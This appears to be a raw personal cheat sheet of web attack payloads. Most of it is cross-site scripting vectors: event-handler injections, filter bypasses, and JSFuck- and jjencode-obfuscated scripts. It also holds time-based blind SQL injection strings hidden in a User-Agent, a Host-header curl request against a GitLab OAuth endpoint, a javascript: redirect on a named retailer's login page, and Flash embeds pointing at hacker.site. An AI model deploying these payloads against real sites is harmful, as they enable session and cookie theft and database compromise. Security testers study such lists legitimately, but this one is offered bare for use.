http://code.google.com/p/domxsswiki

" onblur="haikumsg(8231)"
curl -X POST -H 'Host: 162.243.147.21:81' 'https://gitlab.com/-/jira/login/oauth/access_token'

”/>&_lt;_script>alert(1)&_lt;/scr_ipt&gt”/>

"onmouseover="alert(7946)">
&haiku630498=%27foobar>'"</script><script>alert(2222)</script>

Vector Used  = "2+onmouseover=setTimeout`confirm\u0028document.domain\u0029`+"

"><h1>html<iframe+src=x><!--
"><img+src=x+onerror=alert(document.cookie)>//

Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(6*6-30),0))OR'
Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR'

https://www.exploit-db.com/papers/13045
https://www.hackingarticles.in/manual-sql-injection-exploitation-step-step/
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

" onmouseover=alert(1499) "" title=""

https://www.starbucks.com/account/signin?ReturnUrl=Jav	asc	ript:https ://www.starbucks.com/%0Aalert%28document.domain%29Login)

ResListing.aspx/'%20ondblclick='confirm(2883)'%20Display='?OSCP='><%0a%0a%0a+ARELLI

Vector= “><img src=x onerror=alert(“foobar”)>

" STYLE="width: expression(alert('XSS'));" onblur="confirm(5779)" title="

Vector="><svg onload=alert(1)> title="


Vector="><svg onload=alert(1)> title="

%27%22%20onmouseover%3dalert(1111)

`"accesskey="X"%20onclick="alert(1)"` %22%20accesskey%3d%22X%22%20onclick%3D%22prompt`XSS`


 ===> Alt+SHIFT+X  (input after hidden)
<link rel="canonical" accesskey="X" onclick="alert(1)" />
<input type="hidden" accesskey="X" onclick="alert(1)">

`" type=xx autofocus onfocus=alert(1)//`  (input before hidden)
`javascript:alert(1)//`

\"}})})-confirm`1`;(function(){({if(){/*///

`";alert(1)//`
`"-alert(1)-"`
`"+alert(1)+"`
`"*alert(1)*"`




<brute contenteditable onblur=alert(1)>lose focus! ==> TAB2

<brute contenteditable onfocus=alert(1)>focus this!

<brute contenteditable onkeydown=alert(1)>press any key!>tab N key



"><svg onload=alert(1111)>

');prompt`1`;('

a=<svg%20onload=alert(1)>
">
"+onmouseover=alert(1)//

<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>

"><details+ontoggle="confirm(%0adocument%0a.domain)">

" onblur="haikumsg(9587)" title="

'%20onmouseover='confirm(1111)'%20bad='?


alert(/xss/.source)
window[/alert/.source](8)
with(document)alert(cookie)
alert(document['cookie'])
alert(document[/cookie/.source])
alert(document[/coo/.source+/kie/.source])
<svg/onload=alert(1)>
<video src=x onerror=alert(1);>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==


[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])



$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"(\\\"\\"+$.__$+$.__$+$.___+$.$$$_+(![]+"")[$._$_]+(![]+"")[$._$_]+$._$+",\\"+$.$__+$.___+"\\"+$.__$+$.__$+$._$_+$.$_$_+"\\"+$.__$+$.$$_+$.$$_+$.$_$_+"\\"+$.__$+$._$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\\"\\"+$.$__+$.___+")"+"\"")())();






<ScRiPt>alert(1);<ScRiPt>
<ScRiPt>alert(1);

<script/random>alert(1);</script>

<script
>alert(1);</script>


<scr<script>ipt>alert(1)</scr<script>ipt>
<scr\x00ipt>alert(1)</scr\x00ipt>


<a href="javascript:alert(1)">show</a>
<a href="data:text/html;base64,fdfksdfjdfksdjfsjfsk==">show</a>
<form action="javascript:alert(1)"><button>sebd</button></form>
<form id=x></form><button form="x" formaction="javascript:alert(1)">send</button>
<object data="javascript:alert(1)">
<object data="data:text/html,<script>alert(1)</script>">
<object data="data:text/html;base64, kjfjhsfkjshfsjkdh==">
<object data="//hacker.site/xss.swf">
<embed code="//hacker.site/xss.swf" allowscriptaccess=always>    https://github.com/evilcos/xss.swf

<img src=x onerror=alert(1)>

<body onload=alert(1)>
<input type=image src=x:x onerror=alert(1)>
<isindex onmouseover="alert(1)" >
<form oninput=alert(1)><input></form>
<textarea autofocus onfocus=alert(1)>
<input oncut=alert(1)>
<svg onload=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video><source onerror="alert(1)">
<marquee onstart=alert(1>
<svg/onload=alert(1)>
<svg//////onload=alert(1)>
<svg id=x;onload=alert(1)>
<svg id=`x`onload=alert(1)>
<svg onload%09=alert(1)>
<svg %09onload=alert(1)>
<svg %09onload%20=alert(1)
<svg onload%09%20%28%2C%3B=ALERT(1)>
<script>\u0061lert(1)</script>
<script>\u0061\u006c\u0065\u0072\u0074(1)</script>
<script>eval("\u0061lert(1)")</script>
<script>eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029")</script>
<img src=x onerror="\u0061lert(1)"/>
<img src=x onerror="eval('\14lert(1)')"/>
<img src=x onerror="eval('\x61lert(1)')"/>
<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
</script><a'/onclick=(confirm)("xss")>click
